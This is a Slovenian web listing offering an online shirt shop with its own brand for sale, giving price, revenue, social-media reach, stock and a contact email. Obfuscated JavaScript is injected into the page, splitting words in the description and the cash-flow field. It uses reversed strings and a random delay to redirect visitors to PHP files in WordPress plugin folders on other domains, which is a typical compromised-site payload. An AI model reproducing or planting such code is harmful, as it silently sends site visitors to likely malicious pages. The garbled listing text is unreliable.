SPLETNA TRGOVINA Z LASTNO BLAGOVNO ZNAMKO

 Spletna trgovina

20.000,00€

V prodajo dajem odlično urejeno spletno trgovino, ki je v Sloveniji edina spletna trgovina s takšnim produk$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom in svojo prepoznavnostjo. Gre za moške in ženske srajce za katere imamo certifikat odličnosti, saj delujemo pod lastno blagovno znamko že od leta 2015.

Skozi celotno poslovanje oskrbujemo hotelske verige, glasbene skupine, prodajno osebje podjetij, gostinsko osebje, maturante, udeležence porok, birm, obhajil in podobno.

Blagovna znamka je prisotna na dveh trgih in sicer v Sloveniji in Hrvaški. Gre za dve domeni in sicer obe spletni trgovini sta bili lv letu 2020 prenovljeni v celoti. Opravljena je bila celotna prenova in optimizacija v mesecu aprilu. K temu bi dodali še da je spletna trgovina zelo dobro pozicionirana na spletu tako da ni potrebno dodatno oglaševanje.

Od leta 2015 je bilo veliko truda, časa ter denarja vloženo v sledeče stvari (celotna dokumentacija bo kupcu dana na vpogled):
-Facebook stran za slovenski trg ( cca 29.000 sledilcev)in Hrvaški trg (cca 3000 sledilcev)
-Instagram profil – vezan na sledilce iz Facebook računa
-marketing spletne trgovine ( od leta 2015 do decembra 2020 se je doseglo cca 2.601.980 oseb)
-Opravljenega prometa preko spletne trgovine cca 600.000€
-Pixel
-Emailig seznam vseh kupcev za email marketing

Ob upoštevanju zgoraj napisanega so prihodki gibljejo med 5000 in 15.000 eur mesečno. To je zelo variabilno, odvisno tudi od cenovne politike, ki jo nekdo vodi, in oglaševanja. Vsekakor pa več kot je oglaševanja večji so prihodki.

Spletna trgovina aktivno posluje in ni bila nikoli predmet kakršnihkoli blokad ali kaj podobnega. Prodajam izključno zaradi zdravstvenih razlogov.

Predmet prodaje:
–zaloga v vrednosti 5.000€
–2 spletni trgovini za slovenski in hrvaški trg –prenoveljni leta 2020
-2 facebook računa za slovenski in hrvaški trg s cca 29.000 všečkov
-Pixel, kateri se je kreiral ob 180.000€ investiciji
-Emailig seznam vseh kupcev za email marketing
-uvajanje v delo po prodaji spletne trgovine
-dogovor z proizvajalcem o ekskluzivnem šivanju za našo spletno trgovino
-Facebook račun za marketing

Prosim, da nas kontaktirajo le resno zainteresirani in posredujejo ponudbo preko e-maila: lenikalenii@gmail.com

  • Listing ID: 1602
  • Vključuje: Certifikati, Blagovna znamka, Dogovori z dobavitelji, Zaloge, Spletna stran, Spletne skupine
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2015
  • Denarni <script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tok: 120000
  • Zaloge (MPC): 5000
Contact details

Gorenjska *****

Contact this listing owner